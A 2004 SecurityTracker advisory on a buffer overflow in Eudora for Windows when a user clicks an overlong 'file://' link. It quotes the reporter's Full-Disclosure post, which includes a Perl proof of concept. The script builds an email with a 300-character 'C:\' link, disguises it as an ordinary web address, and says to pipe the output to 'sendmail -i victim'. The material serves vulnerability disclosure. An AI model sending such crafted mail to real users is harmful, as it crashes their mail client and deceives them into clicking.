SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (E-mail Client)  >  Eudora Vendors:  Qualcomm
Eudora Has Buffer Overflow in Loading 'file://' URLs
SecurityTracker Alert ID:  1010088
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 7 2004
Impact:  Not specified
Exploit Included:  Yes  
Version(s): 6.1, 6.0.3 and 5.2.1
Description:  A buffer overflow vulnerability was reported in Eudora in the processing of 'file://' URLs. The impact was not specified.

Paul Szabo reported that a remote user can send an e-mail containing a specially crafted 'file://' URL to a target user. If the target user clicks on the URL and the URL is longer than approximately 300 characters, the buffer overflow will be triggered, the report said.

The impact was not specified.

Windows-based versions are affected. Other platforms were not tested.

A demonstration exploit is provided in the Source Message.
Impact:  The impact was not specified.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.eudora.com/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  psz@maths.usyd.edu.au (Paul Szabo)
Message History:   None.

 Source Message Contents
Date:  Fri, 7 May 2004 12:10:59 +1000 (EST)
From:  psz@maths.usyd.edu.au (Paul Szabo)
Subject:  [Full-Disclosure] Eudora file URL buffer overflow

 

There is a buffer overflow in Eudora for Windows, verified on versions
6.1, 6.0.3 and 5.2.1. This is easily exploitable to run arbitrary code.
I do not know if this issue affects Eudora for Macs.

Demo:

#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";
print "<x-html>\n";
print "<a href=\"C:\\", "A"x300, "\">\n";
print "Fake URL to http://anywhere/I/want</a>\n";
print "</x-html>\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";
print "is for comparison: the user can hardly tell them apart.\n\n";

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC